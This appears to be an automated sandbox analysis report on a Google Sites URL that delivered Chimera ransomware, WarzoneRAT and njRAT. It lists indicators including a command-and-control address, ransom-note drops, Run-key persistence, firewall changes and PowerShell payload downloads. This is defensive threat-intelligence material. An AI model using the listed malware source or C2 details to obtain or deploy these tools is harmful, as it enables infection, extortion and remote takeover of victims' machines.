chimera | hxxps://sites[.]google[.]com/view/thebest1ds

Resubmissions

23-04-2024 19:12

240423-xwkdpsbb22 10

23-04-2024 19:11

240423-xv8d5sba97 1

23-04-2024 19:03

240423-xqn5psba65 10

Analysis

max time kernel
1192s
max time network
1210s
platform
windows11-21h2_x64
resource
win11-20240412-en
resource tags

arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
submitted
23-04-2024 19:12

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-23T19:32:30Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win11-20240412-en/instance_6-dirty.qcow2\"}"

Report Analysis Logs

General

Target

https://sites.google.com/view/thebest1ds

Score

10^/10

chimera njrat warzonerat evasion infostealer persistence ransomware rat rezer0 trojan upx

Malware Config

Extracted

Family

warzonerat

168.61.222.215:5400

Signatures

Chimera 64 IoCs

Ransomware which infects local and network files, often distributed via Dropbox links.

ransomware chimera

Processes:

Amus.exe

description	ioc	process
File created	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files\Microsoft Office\root\loc\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
142	whatismyipaddress.com
File created	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ar-ae\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
143	whatismyipaddress.com
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe

Chimera Ransomware Loader DLL 1 IoCs

Drops/unpacks executable file which resembles Chimera's Loader.dll.

ransomware

Processes:

resource	yara_rule
behavioral1/memory/6352-3306-0x0000000010000000-0x0000000010010000-memory.dmp	chimera_loader_dll

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

ReZer0 packer 1 IoCs

Detects ReZer0, a packer with multiple versions used in various campaigns.

rezer0

Processes:

resource	yara_rule
behavioral1/memory/3896-2267-0x0000000005480000-0x00000000054A8000-memory.dmp	rezer0

Renames multiple (3272) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Warzone RAT payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/4600-2273-0x0000000000400000-0x0000000000553000-memory.dmp	warzonerat
behavioral1/memory/4600-2277-0x0000000000400000-0x0000000000553000-memory.dmp	warzonerat
behavioral1/memory/4600-2278-0x0000000000400000-0x0000000000553000-memory.dmp	warzonerat
behavioral1/memory/4600-2297-0x0000000000400000-0x0000000000553000-memory.dmp	warzonerat

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

1199 4980 powershell.exe
1203 4980 powershell.exe
1210 1628 powershell.exe
1211 1628 powershell.exe
Downloads MZ/PE file

flow	pid	process
1199	4980	powershell.exe
1203	4980	powershell.exe
1210	1628	powershell.exe
1211	1628	powershell.exe

Modifies Installed Components in the registry 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

unregmp2.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\DontAsk = "2"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\Version = "12,0,22000,282"	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\IsInstalled = "0"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\Stubpath = "%SystemRoot%\\system32\\unregmp2.exe /ShowWMP"	unregmp2.exe

Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

3592 netsh.exe

pid	process
3592	netsh.exe

Drops startup file 3 IoCs

Processes:

NJRat.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:Zone.Identifier:$DATA	NJRat.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe

Executes dropped EXE 2 IoCs

Processes:

ddraw32.dllddraw32.dll

pid process

552 ddraw32.dll
1404 ddraw32.dll

pid	process
552	ddraw32.dll
1404	ddraw32.dll

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/3268-2222-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/memory/1232-2288-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral1/memory/1404-2289-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral1/memory/552-2290-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral1/memory/552-2291-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral1/memory/1404-2296-0x0000000000400000-0x0000000000410000-memory.dmp	upx
C:\Users\Admin\Documents\install.exe	upx
behavioral1/memory/4332-2503-0x0000000000400000-0x0000000000413000-memory.dmp	upx
behavioral1/memory/4332-3206-0x0000000000400000-0x0000000000413000-memory.dmp	upx

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

NJRat.exeMantas.exeAmus.exeDuksten.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_The-MALWARE-Repo-master.zip\\The-MALWARE-Repo-master\\RAT\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_The-MALWARE-Repo-master.zip\\The-MALWARE-Repo-master\\RAT\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Manager = "C:\\Windows\\system32\\winmants.exe"	Mantas.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microzoft_Ofiz = "C:\\Windows\\KdzEregli.exe"	Amus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\XRF = "C:\\Windows\\system32\\PrTecTor.exe"	Duksten.exe

Drops desktop.ini file(s) 27 IoCs

Processes:

Amus.exeunregmp2.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Documents\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	Amus.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	Amus.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	Amus.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	Amus.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	Amus.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	Amus.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	Amus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	unregmp2.exe
File opened for modification	C:\Users\Public\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	Amus.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	Amus.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	Amus.exe
File opened for modification	C:\Program Files\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	Amus.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	Amus.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	Amus.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

unregmp2.exewmplayer.exe

description	ioc	process
File opened (read-only)	\??\H:	unregmp2.exe
File opened (read-only)	\??\N:	unregmp2.exe
File opened (read-only)	\??\P:	wmplayer.exe
File opened (read-only)	\??\S:	wmplayer.exe
File opened (read-only)	\??\X:	wmplayer.exe
File opened (read-only)	\??\O:	unregmp2.exe
File opened (read-only)	\??\P:	unregmp2.exe
File opened (read-only)	\??\W:	unregmp2.exe
File opened (read-only)	\??\Y:	unregmp2.exe
File opened (read-only)	\??\E:	wmplayer.exe
File opened (read-only)	\??\A:	unregmp2.exe
File opened (read-only)	\??\A:	wmplayer.exe
File opened (read-only)	\??\B:	wmplayer.exe
File opened (read-only)	\??\G:	wmplayer.exe
File opened (read-only)	\??\I:	wmplayer.exe
File opened (read-only)	\??\M:	wmplayer.exe
File opened (read-only)	\??\B:	unregmp2.exe
File opened (read-only)	\??\L:	unregmp2.exe
File opened (read-only)	\??\Q:	unregmp2.exe
File opened (read-only)	\??\R:	wmplayer.exe
File opened (read-only)	\??\T:	wmplayer.exe
File opened (read-only)	\??\Z:	wmplayer.exe
File opened (read-only)	\??\E:	unregmp2.exe
File opened (read-only)	\??\I:	unregmp2.exe
File opened (read-only)	\??\K:	unregmp2.exe
File opened (read-only)	\??\T:	unregmp2.exe
File opened (read-only)	\??\R:	unregmp2.exe
File opened (read-only)	\??\V:	unregmp2.exe
File opened (read-only)	\??\L:	wmplayer.exe
File opened (read-only)	\??\O:	wmplayer.exe
File opened (read-only)	\??\W:	wmplayer.exe
File opened (read-only)	\??\J:	wmplayer.exe
File opened (read-only)	\??\N:	wmplayer.exe
File opened (read-only)	\??\G:	unregmp2.exe
File opened (read-only)	\??\M:	unregmp2.exe
File opened (read-only)	\??\S:	unregmp2.exe
File opened (read-only)	\??\X:	unregmp2.exe
File opened (read-only)	\??\Z:	unregmp2.exe
File opened (read-only)	\??\H:	wmplayer.exe
File opened (read-only)	\??\Q:	wmplayer.exe
File opened (read-only)	\??\J:	unregmp2.exe
File opened (read-only)	\??\U:	unregmp2.exe
File opened (read-only)	\??\K:	wmplayer.exe
File opened (read-only)	\??\U:	wmplayer.exe
File opened (read-only)	\??\V:	wmplayer.exe
File opened (read-only)	\??\Y:	wmplayer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 sites.google.com
3 sites.google.com
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

141 whatismyipaddress.com
142 whatismyipaddress.com
143 whatismyipaddress.com
896 whatismyipaddress.com
1070 bot.whatismyipaddress.com

flow	ioc
1	sites.google.com
3	sites.google.com

flow	ioc
141	whatismyipaddress.com
142	whatismyipaddress.com
143	whatismyipaddress.com
896	whatismyipaddress.com
1070	bot.whatismyipaddress.com

Drops file in System32 directory 12 IoCs

Processes:

Mantas.exeDuksten.exepowershell.exeBumerang.exepowershell.exeprintfilterpipelinesvc.exe

description	ioc	process
File created	C:\Windows\SysWOW64\winmants.exe:Zone.Identifier:$DATA	Mantas.exe
File opened for modification	C:\Windows\SysWOW64\PrTecTor.exe	Duksten.exe
File created	C:\Windows\SysWOW64\PrTecTor.exe:Zone.Identifier:$DATA	Duksten.exe
File opened for modification	C:\Windows\SysWOW64\regedit.exe	Duksten.exe
File opened for modification	C:\Windows\system32\robux2.zip	powershell.exe
File created	C:\Windows\SysWOW64\ddraw32.dll	Bumerang.exe
File created	C:\Windows\SysWOW64\winmants.exe	Mantas.exe
File opened for modification	C:\Windows\SysWOW64\winmants.exe	Mantas.exe
File created	C:\Windows\SysWOW64\PrTecTor.exe	Duksten.exe
File created	C:\Windows\SysWOW64\regedit.exe	Duksten.exe
File created	C:\Windows\system32\robux2.zip	powershell.exe
File created	C:\Windows\system32\spool\PRINTERS\PPpx848c0k82r64ezeieofst9ud.TMP	printfilterpipelinesvc.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

WarzoneRAT.exe

description pid process target process

PID 3896 set thread context of 4600 3896 WarzoneRAT.exe MSBuild.exe

description	pid	process	target process
PID 3896 set thread context of 4600	3896	WarzoneRAT.exe	MSBuild.exe

Drops file in Program Files directory 64 IoCs

Processes:

Amus.exeMantas.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\FeedbackHubSmallTile.scale-100.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2102.13.0_x64__8wekyb3d8bbwe\Assets\NotepadAppList.scale-125.png	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_x64__8wekyb3d8bbwe\Assets\Scientific.targetsize-64_contrast-black.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\EmptySearch.scale-200.png	Amus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_2x.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib\components\DocumentCard\DocumentCardImage.styles.js	Amus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ui-strings.js	Amus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png	Amus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql120.xsl	Amus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ui-strings.js	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\SnipSketchStoreLogo.scale-200.png	Amus.exe
File created	C:\Program Files\morpheus\my shared folder\serial.exe	Mantas.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\BuildInfo.xml	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleWideTile.scale-200.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-400.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-200_contrast-white.png	Amus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\vscroll-thumb.png	Amus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons_retina.png	Amus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipsen.xml	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\contrast-white\StoreLogo.scale-400_contrast-white.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SnipSketchAppList.targetsize-60_altform-lightunplated.png	Amus.exe
